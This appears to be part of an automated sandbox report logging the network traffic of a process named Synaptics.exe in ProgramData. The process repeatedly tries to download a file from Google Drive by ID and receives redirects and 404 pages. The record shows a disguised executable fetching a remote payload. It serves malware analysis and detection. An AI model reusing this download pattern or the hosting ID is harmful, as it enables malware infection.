                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="sh4RSBxbT2xZvPtHwRIrqA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:44 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    61192.168.2.949817142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:44 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                                                                                                                    2024-12-30 10:25:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-d0qeCqC4OAoDoWnq55pGsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    62192.168.2.949818142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:44 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:44 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7RU4jWpoOyq_fvQkvx9X4v_z6GEQ9DAelptv-f2qz1GSlQmX6vqFwkTqkqFDXKAd3Z
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-lGU5AHtUqSZmJzuePf6TUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:44 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:44 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 44 74 37 5f 35 79 33 50 6b 63 42 49 30 72 62 54 70 4a 63 77 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="ODt7_5y3PkcBI0rbTpJcww">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:44 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    63192.168.2.949821142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:44 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    64192.168.2.949826142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:45 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-roxTaLCKx8ZZ68jcbBQZcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    65192.168.2.949827142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:45 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-xJNtITcHStBpIv08WYBLbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    66192.168.2.949829142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:46 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:46 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-HJ2vbwcFZc3BzjgTjOoZRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    67192.168.2.949831142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:46 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:46 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ItJK-ERegMOP87RLcLy5tQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    68192.168.2.949830142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:46 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:47 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6c0TIrRIk97t1Jr611uUny5uSNuUGcyNuIlKJJeaJKY4IlmsnldZSc2kBN1i2n24Vk
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:46 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-xj94ZCwTsxwd-CI2ClAkIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:47 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:47 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 6c 71 62 75 71 68 56 2d 63 7a 45 36 36 78 38 58 5f 33 32 32 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="ZlqbuqhV-czE66x8X_322w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:47 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    69192.168.2.949828142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:46 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:47 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7UJy_zeg5-NKA4jWQbWcGO8KUIvoCdJzPazZN9BF5w-N73znTyO2WAMErNBDPnjDc6
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wQQ9xDOQtK9h_I33uXQtrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
